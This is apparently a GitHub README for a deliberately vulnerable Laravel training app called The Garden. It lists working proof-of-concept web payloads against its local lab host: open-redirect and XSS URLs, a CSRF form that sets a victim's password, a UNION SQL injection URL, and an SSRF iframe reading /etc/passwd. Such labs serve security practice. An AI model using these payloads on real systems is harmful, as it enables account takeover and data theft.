Giters

gwen001 / thegarden

Vulnerable web application made with Laravel.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

The Garden

It's vulnerable by purpose.

Open Redirect

http://thegarden.local.net/login?r=https://10degres.net and log in
http://thegarden.local.net/?r=https://10degres.net and log out

Information disclosure

IDOR

XSS

http://thegarden.local.net/login?r=111%27%22--%3E%3Csvg/onload=prompt()%3E111 not authenticated http://thegarden.local.net/dashboard?r=111%27%22--%3E%3Csvg/onload=prompt()%3E111 authenticated

http://thegarden.local.net/?q=111%27%22--%3E%3Csvg/onload=prompt()%3E111

http://thegarden.local.net/reset-password/111?email=111%27%22--%3E%3Csvg/onload=prompt()%3E111 not authenticated

CSRF

Profile / Change Password:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://thegarden.local.net/change-password" method="POST">
      <input type="hidden" name="password" value="evilpassword" />
      <input type="hidden" name="password&#95;confirmation" value="evilpassword" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

SQL injection

http://thegarden.local.net/api/orders/29%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20order%20by%20id%23

SSRF

Generate PDF with order->address: 111<iframe src='file:///etc/passwd'></iframe>222

File upload

Profile picture:

About

Vulnerable web application made with Laravel.

Languages

Language:JavaScript 71.6%Language:PHP 17.6%Language:Blade 6.9%Language:CSS 3.8%Language:Shell 0.1%